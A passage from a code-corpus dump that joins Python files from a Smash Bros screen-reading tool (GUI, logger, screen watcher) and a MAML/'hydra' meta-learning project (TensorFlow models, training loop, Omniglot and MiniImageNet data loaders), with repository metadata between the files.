bg=BG[1]) self.game_frame.grid(row=1, column=0, sticky='nsew', padx=10, pady=10) self.watcher_frame = WatcherFrame(self, bg=BG[0]) self.watcher_frame.grid(row=0, column=0, sticky='nsew', padx=10, pady=10) self.menubar = Menubar(self) self.master.config(menu=self.menubar) self.loop() def loop(self): if self.cont: self.check_queue() self.master.after(100, self.loop) def check_queue(self): try: item = self.queue.get(block=False) if item == 'update': 
self.game_frame.display_info() if 'status' in item: self.watcher_frame.watcher_status.config(text=item['status']) except Empty: pass def quit(self): self.cont = False self.master.destroy() def restart(self): self.quit() self.restart_flag = True def character_name_debugging(self): if not self.character_name_debugging_enabled: self.watcher.lock(1) smash_game.character_name_debugging_enabled = True else: self.watcher.unlock() smash_game.character_name_debugging_enabled = False self.character_name_debugging_enabled = not self.character_name_debugging_enabled def click_spectate(self): self.watcher.game.cancelled = 'DEBUG' def run_gui(): root = tk.Tk() root.geometry('540x550') window = Window(root, bg=BG[0]) if ut.SETTINGS['AUTO_START_WATCHER'].lower() == 'true': window.watcher_frame.toggle_watcher() root.mainloop() if window.watcher.isAlive(): window.watcher_queue.put('quit') window.watcher.join() if window.restart_flag: system = platform.system() if system == 'Windows': os.system(__file__) if system == 'Linux': os.system('python3 ' + __file__) def headless(): queue = Queue() watcher_queue = Queue() watcher = smash_watcher.Watcher(watcher_queue, queue) watcher.start() _input = '' while _input not in ['stop', 'exit', 'quit']: _input = input('>: ') key_capture.put('quit') key_capture.join() watcher_queue.put('quit') watcher.join() if __name__ == '__main__': print(f'\n\n{"*" * 40} {TITLE} {"*" * 40}') print(f'<<<{datetime.fromtimestamp(time.time()).strftime("%Y-%m-%d %H:%M:%S")}>>>') if len(argv): if '-nogui' in argv: headless() else: run_gui()
Python
384
35.171875
138
/smash_reader/smash.py
0.596544
0.581281
badgerlordy/smash-bros-reader
refs/heads/master
from datetime import datetime import os from sys import __excepthook__ from time import time from traceback import format_exception BASE_DIR = os.path.realpath(os.path.dirname(__file__)) def log_exception(type, value, tb): error = format_exception(type, value, tb) filepath = os.path.join(BASE_DIR, 'error.log') old_text = '\n' if os.path.isfile(filepath): with open(filepath, 'r') as logfile: old_text += logfile.read() timestamp = datetime.fromtimestamp(time()).strftime('%Y-%m-%d %H:%M:%S') line = f'[{timestamp}]\n{("".join(error))}' new_text = line + old_text with open(filepath, 'w+') as logfile: logfile.write(new_text) __excepthook__(type, value, tb)
Python
23
30.956522
76
/smash_reader/logger.py
0.635374
0.635374
badgerlordy/smash-bros-reader
refs/heads/master
import json from logger import log_exception import os from queue import Empty import re import requests import smash_game import smash_utility as ut import sys import threading import time sys.excepthook = log_exception output = True def _print(*args, **kwargs): if output: args = list(args) args.insert(0, '<Watcher>') print(*args, **kwargs) class Watcher(threading.Thread): def __init__(self, watcher_queue, gui_queue): # print('\n') super().__init__() self.queue = watcher_queue self.gui_queue = gui_queue self.id_coords = [ ('LOBBY', 'FLAGS_ID'), ('LOBBY', 'CARDS_ID'), (), (), ('GAME', 'END_ID'), ('FINAL', 'ID'), ('FINAL', 'ID2') ] self.locked = False self.reset() # Game finished or cancelled def reset(self): if not self.locked: self.current_type_index = 0 self.list_limit = 3 self.sim_lists = [[0] * self.list_limit for _ in range(len(self.id_coords))] self.cont = True self.current_game_num = len(ut.load_game_data()) + 1 self.game = smash_game.Game(self.current_game_num) self.timer_detected = False self.timer_visible = False self.timer_running = False self.timer_running_templates = (None, None) self.timer_sim_hits = 0 # Starts when watcher is created and loops forever def run(self): _print('Watching for flags') self.gui_queue.put({'status': 'Watching for flag screen'}) while self.cont: timer_vis_sim = 0 timer_milli_sim = 0 self.cap = ut.capture_screen() crop = self.cap.crop(ut.COORDS['MENU']['FAILED_TO_PLAY_REPLAY']) if ut.avg_sim(crop, ut.TEMPLATES['MENU']['FAILED_TO_PLAY_REPLAY']) >= 95: self.game.cancelled = 'REPLAY_FAILED' time.sleep(5) ut.send_command('a') if self.game.cancelled: self.reset() if not self.locked: self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for menu screen'}) self.watch_for_menu() if not self.locked: self.gui_queue.put({'status': 'Watching for flag screen'}) # check timer visibility and movement, set class variables if self.current_type_index >= 2: timer_vis_sim = self.check_timer_visibility() timer_milli_sim = 0 if 
self.timer_detected: timer_milli_sim = self.check_timer_movement() # look for the timer at the beginning if self.current_type_index == 2: if self.timer_detected: _print(f'timer detected: {timer_vis_sim}') self.read_screen_data() # wait for the timer to start moving elif self.current_type_index == 3: if self.timer_running: _print(f'timer movemement detected: {timer_milli_sim}') self.read_screen_data() # check to see if the timer is stopped, or the "GAME" text is # detected, or the results screen is detected elif self.current_type_index == 4: if self.check_screen_basic() > 90: # pass because read_screen_data will be called if True # and the rest of the checks will be skipped pass else: # Timer stopped if not self.timer_running: self.read_screen_data() # Results screen detected else: checks = [ self.check_screen_basic(index=5, normal=False), self.check_screen_basic(index=6, normal=False) ] if sum(checks) / 2 > 80: # run twice because the match end screen was missed self.read_screen_data() self.read_screen_data() # check for current basic template (flags, cards, results) else: self.check_screen_basic() self.check_queue() time.sleep(0.1) def check_queue(self): if self.queue: try: item = self.queue.get(block=False) if item == 'quit': self.cont = False except Empty: pass def lock(self, index): self.current_type_index = index - 1 self.read_screen_data() self.locked = True def unlock(self): self.locked = False self.reset() def watch_for_menu(self): templates = [ ut.TEMPLATES['MENU']['SPECTATE_SELECTED'], ut.TEMPLATES['LOBBY']['FLAGS_ID'] ] while self.cont: cap = ut.capture_screen() self.check_queue() crop = cap.crop(ut.COORDS['MENU']['SPECTATE_SELECTED']) if ut.avg_sim(crop, templates[0]) > 95: time.sleep(5) ut.send_command('a') break crop = cap.crop(ut.COORDS['LOBBY']['FLAGS_ID']) if ut.avg_sim(crop, templates[1]) > 95: break ut.send_command('a') time.sleep(2) # @ut.pad_time(0.20) def check_screen_basic(self, index=-1, normal=True, screen=None, area=None): if index == -1: 
index = self.current_type_index if not screen and not area: screen, area = self.id_coords[index] sim = ut.area_sim(self.cap, screen, area) l = self.sim_lists[index] l.insert(0, sim) del l[-1] avg = sum(l) / len(l) if avg > 90: _print(f'Screen type {{{index}}} sim: {avg}') if normal: l = [0] * self.list_limit self.read_screen_data() return avg def check_timer_visibility(self): timer_vis_crop = self.cap.crop(ut.COORDS['GAME']['TIMER_VISIBLE']) template = ut.TEMPLATES['GAME']['TIMER_VISIBLE'] timer_vis_sim = ut.avg_sim(timer_vis_crop, template) if timer_vis_sim > 95: # _print(f'timer vis sim: {timer_vis_sim}') if not self.timer_detected: self.timer_detected = True self.timer_visible = True else: self.timer_visible = False return timer_vis_sim def check_timer_movement(self): timer_sim = 0 if self.timer_visible: coords = ut.COORDS['GAME']['TIMER_MILLI'] crops = [self.cap.crop(coord) for coord in coords] # [crop.show() for crop in crops] if all(self.timer_running_templates): timer_sim = sum([ut.avg_sim(t, c) for t, c in zip(self.timer_running_templates, crops)]) / 2 # for i, crop in enumerate(crops): # timer_sim = ut.avg_sim(crop, self.timer_running_templates[i]) / (i + 1) if timer_sim > 90: _print(f'timer sim: {timer_sim}') self.timer_sim_hits += 1 if self.timer_sim_hits >= 3: if self.timer_running: # self.read_screen_data() self.timer_running = False else: self.timer_running = True self.timer_sim_hits = 0 self.timer_running_templates = crops return timer_sim def battle_watcher(self): pass def filter_and_post(self, game): data = { 'game': ut.filter_game_data( game, self.current_type_index ), 'mode': self.current_type_index } ut.post_data(data) def read_screen_data(self): qp = lambda: self.filter_and_post(self.game.serialize(images_bool=False)) # Flags if self.current_type_index == 0: self.gui_queue.put('update') _print('Flags detected') self.gui_queue.put({'status': 'Watching for card screen'}) # Cards if self.current_type_index == 1: _print('Cards detected') 
self.gui_queue.put({'status': 'Reading cards'}) time.sleep(1) self.cap = ut.capture_screen() self.game.read_card_screen(self.cap) qp() self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for battle pregame'}) # Pregame if self.current_type_index == 2: _print('Battle pregame detected') self.game.read_start_screen(self.cap) qp() self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for battle start'}) # Game started if self.current_type_index == 3: _print('Battle start detected') qp() self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for battle end'}) # Game ended if self.current_type_index == 4: _print('Battle end detected') qp() self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for battle results'}) # Results if self.current_type_index == 5: _print('Battle results detected') self.game.read_results_screen(self.cap) qp() self.gui_queue.put('update') self.gui_queue.put({'status': 'Watching for flag screen'}) # ut.save_game_data(self.game.serialize()) if not self.locked: self.current_type_index += 1 if self.current_type_index >= 6: self.reset() _print(f'Mode changed to {self.current_type_index}') # _print(json.dumps(self.game.serialize(), separators=(',', ': ')))
Python
290
34.265518
108
/smash_reader/smash_watcher.py
0.505427
0.499169
radrumond/hidra
refs/heads/master
# ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow import os import numpy as np import tensorflow as tf from archs.maml import MAML class Model(MAML): def __init__(self,train_lr,meta_lr,image_shape,isMIN, label_size=2): super().__init__(train_lr,meta_lr,image_shape,isMIN,label_size) def dense_weights(self): weights = {} cells = {} initializer = tf.contrib.layers.xavier_initializer() print("Creating/loading Weights") divider = 1 inic = 1 filters = 64 finals = 64 if self.isMIN: divider = 2 inic = 3 finals = 800 filters = 32 with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE): weights['c_1'] = tf.get_variable('c_1', shape=(3,3, inic,filters), initializer=initializer) weights['c_2'] = tf.get_variable('c_2', shape=(3,3,filters,filters), initializer=initializer) weights['c_3'] = tf.get_variable('c_3', shape=(3,3,filters,filters), initializer=initializer) weights['c_4'] = tf.get_variable('c_4', shape=(3,3,filters,filters), initializer=initializer) weights['cb_1'] = tf.get_variable('cb_1', shape=(filters), initializer=tf.initializers.constant) weights['cb_2'] = tf.get_variable('cb_2', shape=(filters), initializer=tf.initializers.constant) weights['cb_3'] = tf.get_variable('cb_3', shape=(filters), initializer=tf.initializers.constant) weights['cb_4'] = tf.get_variable('cb_4', shape=(filters), initializer=tf.initializers.constant) weights['d_1'] = tf.get_variable('d_1w', [finals,self.label_size], initializer = initializer) weights['b_1'] = tf.get_variable('d_1b', [self.label_size], initializer=tf.initializers.constant) """weights['mean'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) weights['variance'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) weights['offset'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) weights['scale'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() ) weights['mean1'] = 
tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) weights['variance1'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) weights['offset1'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) weights['scale1'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() ) weights['mean2'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) weights['variance2'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) weights['offset2'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) weights['scale2'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() ) weights['mean3'] = tf.get_variable('mean', [64], initializer=tf.zeros_initializer()) weights['variance3'] = tf.get_variable('variance',[64], initializer=tf.ones_initializer() ) weights['offset3'] = tf.get_variable('offset', [64], initializer=tf.zeros_initializer()) weights['scale3'] = tf.get_variable('scale', [64], initializer=tf.ones_initializer() )""" print("Done Creating/loading Weights") return weights, cells def forward(self,x,weights, training): conv1 = self.conv_layer(x, weights["c_1"],weights["cb_1"],"conv1") conv1 = tf.layers.batch_normalization(conv1, name="bn1", reuse=tf.AUTO_REUSE) conv1 = tf.nn.relu(conv1) conv1 = tf.layers.MaxPooling2D(2,2)(conv1) conv2 = self.conv_layer(conv1,weights["c_2"],weights["cb_2"],"conv2") conv2 = tf.layers.batch_normalization(conv2, name="bn2", reuse=tf.AUTO_REUSE) conv2 = tf.nn.relu(conv2) conv2 = tf.layers.MaxPooling2D(2,2)(conv2) conv3 = self.conv_layer(conv2,weights["c_3"],weights["cb_3"],"conv3") conv3 = tf.layers.batch_normalization(conv3, name="bn3", reuse=tf.AUTO_REUSE) conv3 = tf.nn.relu(conv3) conv3 = tf.layers.MaxPooling2D(2,2)(conv3) conv4 = self.conv_layer(conv3,weights["c_4"],weights["cb_4"],"conv4") conv4 = tf.layers.batch_normalization(conv4, name="bn4", reuse=tf.AUTO_REUSE) conv4 = tf.nn.relu(conv4) conv4 = 
tf.layers.MaxPooling2D(2,2)(conv4) # print(conv4) # bn = tf.squeeze(conv4,axis=(1,2)) bn = tf.layers.Flatten()(conv4) # tf.reshape(bn, [3244,234]) fc1 = self.fc_layer(bn,"dense1",weights["d_1"],weights["b_1"]) # bn = tf.reshape(bn,[-1,]) return fc1
Python
87
57.298851
112
/archs/fcn.py
0.591994
0.559061
radrumond/hidra
refs/heads/master
import numpy as np import tensorflow as tf from data_gen.omni_gen import unison_shuffled_copies,OmniChar_Gen, MiniImgNet_Gen import time def train( m, mt, # m is the model foir training, mt is the model for testing data_sampler, # Creates the data generator for training and testing min_classes, # minimum amount of classes max_classes, # maximum || || || train_shots, # number of samples per class (train) test_shots, # number of samples per class (test) meta_batch, # Number of tasks meta_iters, # Number of iterations test_iters, # Iterations in Test train_step, name): # Experiment name for experiments sess = tf.Session() sess.run(tf.global_variables_initializer()) # bnorms = [v for v in tf.global_variables() if "bn" in v.name] #---------Performance Tracking lists--------------------------------------- losses = [] temp_yp = [] temp_ypn= [] nls = [] aps = [] buffer = [] lossesB = [] #-------------------------------------------------------------------------- #---------Load train and test data-sets------------------------------------ train_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"train") if mt is not None: test_gen = data_sampler.sample_Task(meta_batch,min_classes,max_classes+1,train_shots,test_shots,"test" ) m.loadWeights(sess, name, step=str(int(train_step)), model_name=name+".ckpt") #-------------------------------------------------------------------------- #TRAIN LOOP print("Starting meta training:") start = time.time() for i in range(meta_iters): xb1,yb1,xb2,yb2 = next(train_gen) num_l = [len(np.unique(np.argmax(yb1,axis=-1)))] if m.maml_n == 2: # in case it uses hydra master node, it should re-assign the output nodes from the master sess.run(m.init_assign, feed_dict={m.label_n:[5]}) l,_,vals,ps=sess.run([m.train_loss,m.meta_op,m.val_losses,m.val_predictions],feed_dict={m.train_xb: xb1, m.train_yb: yb1, m.val_xb:xb2, m.val_yb:yb2, m.label_n:num_l}) if m.maml_n == 2: # in case it uses hydra master node, it should 
update the master sess.run(m.final_assign,feed_dict={m.label_n:num_l}) losses.append(vals) lossesB.append(vals) buffer.append(l) #Calculate accuaracies aux = [] tmp_pred = np.argmax(np.reshape(ps[-1],[-1,num_l[0]]),axis=-1) tmp_true = np.argmax(np.reshape(yb2,[-1,num_l[0]]),axis=-1) for ccci in range(num_l[0]): tmp_idx = np.where(tmp_true==ccci)[0] #print(tmp_idx) aux.append(np.mean(tmp_pred[tmp_idx]==tmp_true[tmp_idx])) temp_yp.append(np.mean(tmp_pred==tmp_true)) temp_ypn.append(aux) #EVALUATE and PRINT if i%100==0: testString = "" #If we give a test model, it will test using the weights from train if mt is not None and i%1000==0: lossestest = [] buffertest = [] lossesBtest = [] temp_yptest = [] for z in range(100): if m.maml_n == 2: sess.run(mt.init_assign, feed_dict={mt.label_n:[5]}) xb1,yb1,xb2,yb2 = next(test_gen) num_l = [len(np.unique(np.argmax(yb1,axis=-1)))] l,vals,ps=sess.run([mt.test_train_loss,mt.test_val_losses,mt.val_predictions],feed_dict={mt.train_xb: xb1, mt.train_yb: yb1, mt.val_xb:xb2, mt.val_yb:yb2, mt.label_n:num_l}) lossestest.append(vals) lossesBtest.append(vals) buffertest.append(l) temp_yptest.append(np.mean(np.argmax(ps[-1],axis=-1)==np.argmax(yb2,axis=-1))) testString = f"\n TEST: TLoss {np.mean(buffertest):.3f} VLoss {np.mean(lossesBtest,axis=0)[-1]:.3f}, ACCURACY {np.mean(temp_yptest):.4f}" print(f"Epoch {i}: TLoss {np.mean(buffer):.4f}, VLoss {np.mean(lossesB,axis=0)[-1]:.4f},", f"Accuracy {np.mean(temp_yp):.4}", f", Per label acc: {[float('%.4f' % elem) for elem in aux]}", f"Finished in {time.time()-start}s",testString) buffer = [] lossesB = [] temp_yp = [] start = time.time() # f"\n TRUE: {yb2}\n PRED: {ps}") if i%5000==0: print("Saving...") m.saveWeights(sess, name, i, model_name=name+".ckpt") m.saveWeights(sess, name, i, model_name=name+".ckpt")
Python
108
50.009258
162
/train.py
0.451988
0.439281
radrumond/hidra
refs/heads/master
# ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow import os import numpy as np import tensorflow as tf class MAML: def __init__(self,train_lr,meta_lr,image_shape, isMIN, label_size=2): self.train_lr = train_lr self.meta_lr = meta_lr self.image_shape = image_shape self.isMIN = isMIN self.saver = None self.label_size = label_size self.finals = 64 self.maml_n = 1 if isMIN: self.finals = 800 def build(self, K, meta_batchsz, mode='train'): # Meta batch of tasks self.train_xb = tf.placeholder(tf.float32, [None,None,None,None,self.image_shape[-1]]) self.train_yb = tf.placeholder(tf.float32, [None,None,None]) self.val_xb = tf.placeholder(tf.float32, [None,None,None,None,self.image_shape[-1]]) self.val_yb = tf.placeholder(tf.float32, [None,None,None]) self.label_n = tf.placeholder(tf.int32 , 1, name="num_labs") #Initialize weights self.weights, self.cells = self.dense_weights() training = True if mode is 'train' else False # Handle one task update def meta_task(inputs): train_x, train_y, val_x, val_y = inputs val_preds, val_losses = [], [] train_pred = self.forward(train_x, self.weights, training) train_loss = tf.losses.softmax_cross_entropy(train_y,train_pred) grads = tf.gradients(train_loss, list(self.weights.values())) gvs = dict(zip(self.weights.keys(), grads)) a=[self.weights[key] - self.train_lr * gvs[key] for key in self.weights.keys()] # for key in self.weights.keys(): # print(key, gvs[key]) fast_weights = dict(zip(self.weights.keys(),a)) # Validation after each update val_pred = self.forward(val_x, fast_weights, training) val_loss = tf.losses.softmax_cross_entropy(val_y,val_pred) # record T0 pred and loss for meta-test val_preds.append(val_pred) val_losses.append(val_loss) # continue to build T1-TK steps graph for _ in range(1, K): # Update weights on train data of task t loss = tf.losses.softmax_cross_entropy(train_y,self.forward(train_x, fast_weights, training)) grads = 
tf.gradients(loss, list(fast_weights.values())) gvs = dict(zip(fast_weights.keys(), grads)) fast_weights = dict(zip(fast_weights.keys(), [fast_weights[key] - self.train_lr * gvs[key] for key in fast_weights.keys()])) # Evaluate validation data of task t val_pred = self.forward(val_x, fast_weights, training) val_loss = tf.losses.softmax_cross_entropy(val_y,val_pred) val_preds.append(val_pred) val_losses.append(val_loss) result = [train_pred, train_loss, val_preds, val_losses] return result out_dtype = [tf.float32, tf.float32,[tf.float32] * K, [tf.float32] * K] result = tf.map_fn(meta_task, elems=(self.train_xb, self.train_yb, self.val_xb, self.val_yb), dtype=out_dtype, parallel_iterations=meta_batchsz, name='map_fn') train_pred_tasks, train_loss_tasks, val_preds_tasks, val_losses_tasks = result if mode is 'train': self.train_loss = train_loss = tf.reduce_sum(train_loss_tasks) / meta_batchsz self.val_losses = val_losses = [tf.reduce_sum(val_losses_tasks[j]) / meta_batchsz for j in range(K)] self.val_predictions = val_preds_tasks optimizer = tf.train.AdamOptimizer(self.meta_lr, name='meta_optim') gvs = optimizer.compute_gradients(self.val_losses[-1]) gvs = [(tf.clip_by_norm(grad, 10), var) for grad, var in gvs] self.meta_op = optimizer.apply_gradients(gvs) else: self.test_train_loss = train_loss = tf.reduce_sum(train_loss_tasks) / meta_batchsz self.test_val_losses = val_losses = [tf.reduce_sum(val_losses_tasks[j]) / meta_batchsz for j in range(K)] self.val_predictions = val_preds_tasks self.saving_weights = tf.trainable_variables() def conv_layer(self, x, W, b, name, strides=1): with tf.variable_scope(name,reuse=tf.AUTO_REUSE): x = tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME') x = tf.nn.bias_add(x, b) return x def fc_layer(self,x, name, weights=None, biases=None): with tf.variable_scope(name,reuse=tf.AUTO_REUSE): fc = tf.matmul(x, weights) fc = tf.nn.bias_add(fc, biases) return fc def loadWeights(self, sess, name, step=0, modeldir='./model_checkpoint/', 
model_name='model.ckpt'): if self.saver == None: z = self.saving_weights #print("KEYS:", z.keys()) self.saver = tf.train.Saver(var_list=z, max_to_keep=12) saver = self.saver checkpoint_path = modeldir + f"{name}/"+model_name +"-" + step if os.path.isfile(checkpoint_path+".marker"): saver.restore(sess, checkpoint_path) print('The checkpoint has been loaded.') else: print(checkpoint_path+".marker not found. Starting from scratch.") def saveWeights(self, sess, name, step=0, modeldir='./model_checkpoint/', model_name='model.ckpt'): if self.saver == None: z = self.saving_weights self.saver = tf.train.Saver(var_list=z, max_to_keep=12) saver = self.saver checkpoint_path = modeldir + f"{name}/"+model_name if not os.path.exists(modeldir): os.makedirs(modeldir) saver.save(sess, checkpoint_path, global_step=step) print('The checkpoint has been created.') open(checkpoint_path+"-"+str(int(step))+".marker", 'a').close() def dense_weights(self): return def forward(self,x,weights, training): return
Python
136
44.830883
140
/archs/maml.py
0.579429
0.571406
radrumond/hidra
refs/heads/master
# ADAPTED BY Rafael Rego Drumond and Lukas Brinkmeyer # THIS IMPLEMENTATION USES THE CODE FROM: https://github.com/dragen1860/MAML-TensorFlow import numpy as np import tensorflow as tf from archs.maml2 import MAML def getBin(l=10): x_ = 2 n = 1 while x_ < l: x_ = x_* 2 n += 1 numbers = [] for i in range(l): num = [] for j in list('{0:0b}'.format(i+1).zfill(n)): num.append(int(j)) numbers.append(num) return numbers class Model(MAML): def __init__(self,train_lr,meta_lr,image_shape,isMIN, label_size=2): super().__init__(train_lr,meta_lr,image_shape,isMIN, label_size) self.finals = 64 if isMIN: self.finals = 800 def getBin(self, l=10): x_ = 2 n = 1 while x_ < l: x_ = x_* 2 n += 1 numbers = [] for i in range(l): num = [] for j in list('{0:0b}'.format(i+1).zfill(n)): num.append(int(j)) numbers.append(num) return numbers def dense_weights(self): weights = {} cells = {} initializer = tf.contrib.layers.xavier_initializer() divider = 1 inic = 1 filters = 64 self.finals = 64 if self.isMIN: print("\n\n\n\n\n\n\n\n\nIS MIN\n\n\n\n\n\n\n\n\n\n\n") divider = 2 inic = 3 self.finals = 800 filters = 32 with tf.variable_scope('MASTER', reuse= tf.AUTO_REUSE): cells['d_1'] = tf.get_variable('MASTER_d_1w', [self.finals,1], initializer = initializer) cells['b_1'] = tf.get_variable('MASTER_d_1b', [1], initializer=tf.initializers.constant) with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE): weights['c_1'] = tf.get_variable('c_1', shape=(3,3, inic,filters), initializer=initializer) weights['c_2'] = tf.get_variable('c_2', shape=(3,3,filters,filters), initializer=initializer) weights['c_3'] = tf.get_variable('c_3', shape=(3,3,filters,filters), initializer=initializer) weights['c_4'] = tf.get_variable('c_4', shape=(3,3,filters,filters), initializer=initializer) weights['cb_1'] = tf.get_variable('cb_1', shape=(filters), initializer=tf.initializers.constant) weights['cb_2'] = tf.get_variable('cb_2', shape=(filters), initializer=tf.initializers.constant) weights['cb_3'] = 
tf.get_variable('cb_3', shape=(filters), initializer=tf.initializers.constant) weights['cb_4'] = tf.get_variable('cb_4', shape=(filters), initializer=tf.initializers.constant) for i in range (self.max_labels): weights['d_1w'+str(i)] = tf.get_variable('d_1w'+str(i), [self.finals,1], initializer = initializer) weights['b_1w'+str(i)] = tf.get_variable('d_1b'+str(i), [1], initializer=tf.initializers.constant) return weights, cells def forward(self,x,weights, training): # with tf.variable_scope('MAML', reuse= tf.AUTO_REUSE): conv1 = self.conv_layer(x, weights["c_1"],weights["cb_1"],"conv1") conv1 = tf.layers.batch_normalization(conv1, name="bn1", reuse=tf.AUTO_REUSE) conv1 = tf.nn.relu(conv1) conv1 = tf.layers.MaxPooling2D(2,2)(conv1) conv2 = self.conv_layer(conv1,weights["c_2"],weights["cb_2"],"conv2") conv2 = tf.layers.batch_normalization(conv2, name="bn2", reuse=tf.AUTO_REUSE) conv2 = tf.nn.relu(conv2) conv2 = tf.layers.MaxPooling2D(2,2)(conv2) conv3 = self.conv_layer(conv2,weights["c_3"],weights["cb_3"],"conv3") conv3 = tf.layers.batch_normalization(conv3, name="bn3", reuse=tf.AUTO_REUSE) conv3 = tf.nn.relu(conv3) conv3 = tf.layers.MaxPooling2D(2,2)(conv3) conv4 = self.conv_layer(conv3,weights["c_4"],weights["cb_4"],"conv4") conv4 = tf.layers.batch_normalization(conv4, name="bn4", reuse=tf.AUTO_REUSE) conv4 = tf.nn.relu(conv4) conv4 = tf.layers.MaxPooling2D(2,2)(conv4) bn = tf.layers.Flatten()(conv4) agg = [self.fc_layer(bn,"dense"+str(i),weights["d_1w"+str(i)],weights["b_1w"+str(i)]) for i in range(self.max_labels)] fc1 = tf.concat(agg, axis=-1)[:,:self.label_n[0]] return fc1
Python
102
41.862743
126
/archs/hydra.py
0.566102
0.533166
radrumond/hidra
refs/heads/master
import numpy as np import os import cv2 import pickle class MiniImgNet_Gen: def __init__(self,path="/tmp/data/miniimagenet",data_path=None): if data_path is None: self.path = path self.train_paths = ["train/"+x for x in os.listdir(path+"/train")] self.test_paths = ["test/"+x for x in os.listdir(path+"/test")] self.val_paths = ["val/"+x for x in os.listdir(path+"/val")] self.data_path = data_path self.meta_train = None self.meta_test = None self.meta_val = None def sample_Task(self,mb_size, min_class,max_class,train_size,test_size,training="train",shuffle=True): print('Loading MiniImagenet data...') if training == "train": if self.meta_train is None: meta_data = [] for idx,im_class in enumerate(self.train_paths): meta_data.append(np.array(loadImgDir(self.path+"/"+im_class,[84,84],rgb=True))) self.meta_train = meta_data else: meta_data = self.meta_train elif training == "val": if self.meta_val is None: meta_data = [] for idx,im_class in enumerate(self.val_paths): # print(idx) meta_data.append(np.array(loadImgDir(self.path+"/"+im_class,[84,84],rgb=True))) self.meta_val = meta_data else: meta_data = self.meta_val elif training == "test": if self.meta_test is None: meta_data = [] for idx,im_class in enumerate(self.test_paths): # print(idx) meta_data.append(np.array(loadImgDir(self.path+"/"+im_class,[84,84],rgb=True))) self.meta_test = meta_data else: meta_data = self.meta_test else: raise ValueError("Training needs to be train, val or test") print(f'Finished loading MiniImagenet data: {np.array(meta_data).shape}') if min_class < 2: raise ValueError("Minimum number of classes must be >=2") while True: meta_train_x = [] meta_train_y = [] meta_test_x = [] meta_test_y = [] # sample fixed number classes for a meta batch nr_classes = np.random.randint(min_class,max_class) for mb in range(mb_size): # select which classes in the meta batch classes = np.random.choice(range(len(meta_data)),nr_classes,replace=False) train_x = [] train_y = [] test_x = [] test_y = [] for label_nr,cl 
in enumerate(classes): images = np.random.choice(len(meta_data[cl]),train_size+test_size,False) train_imgs = images[:train_size] test_imgs = images[train_size:] train_x.append(meta_data[cl][train_imgs]) test_x.append(meta_data[cl][test_imgs]) train_y.append(np.ones(train_size)*label_nr) test_y.append(np.ones(test_size)*label_nr) train_x = np.array(train_x) train_y = np.eye(len(classes))[np.reshape(np.array(train_y),-1).astype(int)] test_x = np.array(test_x) test_y = np.eye(len(classes))[np.reshape(np.array(test_y),-1).astype(int)] train_x = np.reshape(train_x,[-1,84,84,3]) test_x = np.reshape(test_x,[-1,84,84,3]) if shuffle: train_x,train_y = unison_shuffled_copies(train_x,train_y) test_x,test_y = unison_shuffled_copies(test_x,test_y) meta_train_x.append(train_x) meta_train_y.append(train_y) meta_test_x.append(test_x) meta_test_y.append(test_y) # print('YIEEEEEEELDING') yield meta_train_x,meta_train_y,meta_test_x,meta_test_y # Initiates the Omniglot dataset and splits into meta train and meta task class OmniChar_Gen: def __init__(self,path="/tmp/data/omniglot",data_path=None,test_idx=None): self.path = path self.tasks = ["/images_background/"+x for x in os.listdir(path+"/images_background")]+["/images_evaluation/"+x for x in os.listdir(path+"/images_evaluation")] self.lens = {} for task in self.tasks: self.lens[task] = len(os.listdir(self.path+task)) self.meta_data = [] print("Loading Omniglot data") for idx,task in enumerate(range(len(self.tasks))): if idx%10==0: print(f"Loading tasks {idx}/{len(self.tasks)}") data = [] for char in os.listdir(self.path+self.tasks[task]): c = [] for img in os.listdir(self.path+self.tasks[task]+"/"+char): c.append(readImg(self.path+self.tasks[task]+"/"+char+"/"+img)) data.append(c) self.meta_data.append(data) self.meta_data = np.concatenate(self.meta_data) print("Finished loading data") if test_idx==None: self.train_idx = list(range(len(self.meta_data))) np.random.shuffle(self.train_idx) self.test_idx = self.train_idx[1200:] 
self.train_idx = self.train_idx[:1200] print("Test_idx:",self.test_idx) else: self.test_idx = test_idx self.train_idx = list(set(list(range(len(self.meta_data)))) - set(self.test_idx)) # Builds a generator that samples meta batches from meta training/test data def sample_Task(self,mb_size, min_class,max_class,train_size,test_size,training="train",shuffle=True): if training == "train": idx = self.train_idx elif training == "test": idx = self.test_idx else: raise ValueError("Omniglot only supports train and test for training param") if min_class < 2: raise ValueError("Minimum number of classes must be >=2") ## We can remove this later and make it dynamic while True: image_idx = idx.copy() np.random.shuffle(image_idx) meta_train_x = [] meta_train_y = [] meta_test_x = [] meta_test_y = [] # Roll number of classes in the mb nr_classes = np.random.randint(min_class,max_class) for task in range(mb_size): train_x = [] train_y = [] test_x = [] test_y = [] # Sample the characters for the task chars = np.random.choice(image_idx,nr_classes,False) # Sample the shots for each character for label_nr,char in enumerate(chars): images = np.random.choice(range(20),train_size+test_size,False) train_imgs = images[:train_size] test_imgs = images[train_size:] train_x.append(self.meta_data[char][train_imgs]) test_x.append(self.meta_data[char][test_imgs]) train_y.append(np.ones(train_size)*label_nr) test_y.append(np.ones(test_size)*label_nr) train_x = np.array(train_x) train_y = 